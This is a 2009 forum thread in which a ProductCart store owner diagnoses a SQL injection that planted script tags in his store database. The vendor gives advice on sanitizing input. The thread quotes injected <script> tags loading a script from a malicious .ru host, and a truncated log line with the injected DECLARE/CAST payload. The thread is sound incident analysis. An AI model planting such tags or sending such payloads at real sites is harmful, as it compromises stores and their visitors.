SQL injection victim?

Message Topic Search Topic Options Post Reply Create New Topic Printable Version Translate Topic

   This morning our ProductCart 3.51 store was taking forever to load. When the home page finally came up, all the buttons under the featured items were red X's with text, which threw our columns totally off.

I right-clicked on the box where the button should be and looked at properties. After the .gif in the image filename was some script pointing to bannerdriven.ru/ads.js. I started digging around. The layout and icons tables had been modified with this script at the end of each value. The pcStoreSettings had also been altered with these script tags inserted into various fields:

Store closed message: The store is temporarily closed so we can perform a software upgrade. Please try back after 10:00 a.m. CDT.<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

SSL URL: https://www.ourregularurl.com<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

Home page: <script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

More digging shows other tables have been affected, like Orders. 

This looks like a SQL injection attack. We have the Windows firewall on the Win2008 web server where this site runs set to only allow direct SQL TCP/IP connections from the web server itself and our office's dedicated IP block (we use SQL replication for a couple of databases that drive other websites on this server)

I googled bannerdriven.ru and it looks like lots of sites have had their script injected into fields.

Author	Message Topic Search Topic Options Post Reply Create New Topic Printable Version Translate Topic
BrianRoden Members Profile Send Private Message Find Members Posts Add to Buddy List Groupie Joined: 07-September-2007 Status: Offline Points: 0	Post Options Post Reply Quote BrianRoden Report Post Thanks(0) Quote Reply Topic: SQL injection victim? Posted: 25-September-2009 at 12:23pm
	This morning our ProductCart 3.51 store was taking forever to load. When the home page finally came up, all the buttons under the featured items were red X's with text, which threw our columns totally off. I right-clicked on the box where the button should be and looked at properties. After the .gif in the image filename was some script pointing to bannerdriven.ru/ads.js. I started digging around. The layout and icons tables had been modified with this script at the end of each value. The pcStoreSettings had also been altered with these script tags inserted into various fields: Store closed message: The store is temporarily closed so we can perform a software upgrade. Please try back after 10:00 a.m. CDT.<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script> SSL URL: https://www.ourregularurl.com<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script> Home page: <script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script> More digging shows other tables have been affected, like Orders. This looks like a SQL injection attack. We have the Windows firewall on the Win2008 web server where this site runs set to only allow direct SQL TCP/IP connections from the web server itself and our office's dedicated IP block (we use SQL replication for a couple of databases that drive other websites on this server) I googled bannerdriven.ru and it looks like lots of sites have had their script injected into fields.

Hamish Members Profile Send Private Message Find Members Posts Add to Buddy List Admin Group Joined: 12-October-2006 Location: United Kingdom Status: Offline Points: 56	Post Options Post Reply Quote Hamish Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 12:43pm
	Hi, You will need to get the database restored from a backup and investigate the logs to see if you can determine the source of the breach.We are not aware of any exploitable vulnerabilities in ProductCart v3.51 code. If you have made modifications please make sure the data is sanatized correctly, see - http://wiki.earlyimpact.com/how_to/sanitize_strings Also see - http://wiki.earlyimpact.com/productcart/securityrec#stores_using_a_ms_sql_database I would also recommend checking that no other files on the site have been modified. Hamish Edited by earlyimp - 25-September-2009 at 12:45pm
	Editing ProductCart Code? See WIKI Guidelines for Editing ProductCart's ASP Source Code

ProductCart Members Profile Send Private Message Find Members Posts Add to Buddy List Admin Group ProductCart Team Joined: 01-October-2003 Status: Offline Points: 135	Post Options Post Reply Quote ProductCart Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 12:43pm
	Brian, we don't have any reports of any vulnerabilities in ProductCart v3.51. In our experience, the number one source of security holes is custom code: - have you modified any of the source code? - are you running any add-on's not provided by Early Impact? Since some of the information might be confidential, we recommend that you open a support ticket.
	The ProductCart Team Home of ProductCart shopping cart software

ProductCart Members Profile Send Private Message Find Members Posts Add to Buddy List Admin Group ProductCart Team Joined: 01-October-2003 Status: Offline Points: 135	Post Options Post Reply Quote ProductCart Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 12:46pm
	Two of us posted at the same time :-) The idea is the same, as you can see. You need to review any modifications ever made to your ProductCart source code to ensure that they did not introduce a security issue.
	The ProductCart Team Home of ProductCart shopping cart software

BrianRoden Members Profile Send Private Message Find Members Posts Add to Buddy List Groupie Joined: 07-September-2007 Status: Offline Points: 0	Post Options Post Reply Quote BrianRoden Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 1:21pm
	Using GreyBeard's session saver add-in. We've made minor mods to source code on some of our PC sites (we have 3). Rearranging layouts, changing the Continue Shopping button on the shopping cart page to go back to the category the user just bought from, instead of back to the home page. We added an RSS feed as an ASPX app in a subfolder to display the newest products per category for people who want to subscribe to get updates on their craft of interest. It accesses the same DB and works off an URL that has a category ID passed in the query string. Wonder if someone used the RSS URL. I'll check the ISS logs.

ProductCart Members Profile Send Private Message Find Members Posts Add to Buddy List Admin Group ProductCart Team Joined: 01-October-2003 Status: Offline Points: 135	Post Options Post Reply Quote ProductCart Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 1:29pm
	Yes, the query string that carries the category ID would be the first thing to review. Incorrectly sanitizing a query string is normally the number one culprit for SQL injection.
	The ProductCart Team Home of ProductCart shopping cart software

BrianRoden Members Profile Send Private Message Find Members Posts Add to Buddy List Groupie Joined: 07-September-2007 Status: Offline Points: 0	Post Options Post Reply Quote BrianRoden Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 1:43pm
	The RSS feed is its own app in ISS, with its own separate log files, new file each day. The last log file was from 9/18/09. Doesn't look like this was the vector, or we would have had an entry for yesterday. We know yesterday is when the problem started, because Thursday night's DB backup was clean and we were able to restore it to get the DB back to normal. Searching the ISS log for the PC site, the first occurrence of bannerdriven.ru shows up at 4:40 p.m. yesterday. I'm going to keep digging.

BrianRoden Members Profile Send Private Message Find Members Posts Add to Buddy List Groupie Joined: 07-September-2007 Status: Offline Points: 0	Post Options Post Reply Quote BrianRoden Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 3:15pm
	Found this page http://www.sophos.com/blogs/sophoslabs/v/post/1329 then searched yesterday's IIS log for this site for the string SET%20 and found this 2009-09-24 16:40:03 W3SVC6487 servername se.rv.er.ip GET /cart/pc/viewCategories.asp idCategory=2;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056 (I've omitted the full string for security purposes) I'll open a support ticket with the complete string Edited by BrianRoden - 25-September-2009 at 3:17pm

BrianRoden Members Profile Send Private Message Find Members Posts Add to Buddy List Groupie Joined: 07-September-2007 Status: Offline Points: 0	Post Options Post Reply Quote BrianRoden Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 4:00pm
	Found the problem. We had added some code in the footer.asp to check the current category and work back up the tree to the top-level category, then insert banner ad code from an Excel file based on the top-level category. I failed to check the idCategory with validNum, which allowed the stuff after the semicolon to get through. I do most of my development in ASP.net, using object data source and parameterized queries with stored procedures that check stuff on the back end. Not used to doing it the classic ASP way.

ProductCart Members Profile Send Private Message Find Members Posts Add to Buddy List Admin Group ProductCart Team Joined: 01-October-2003 Status: Offline Points: 135	Post Options Post Reply Quote ProductCart Report Post Thanks(0) Quote Reply Posted: 25-September-2009 at 5:04pm
	Hi Brian, Thanks for updating the post with this information. It's a good reminder for everyone to make sure all database input is sanitized per the instructions on the following page from our WIKI: http://wiki.earlyimpact.com/how_to/sanitize_strings Sincerely, Early Impact
	The ProductCart Team Home of ProductCart shopping cart software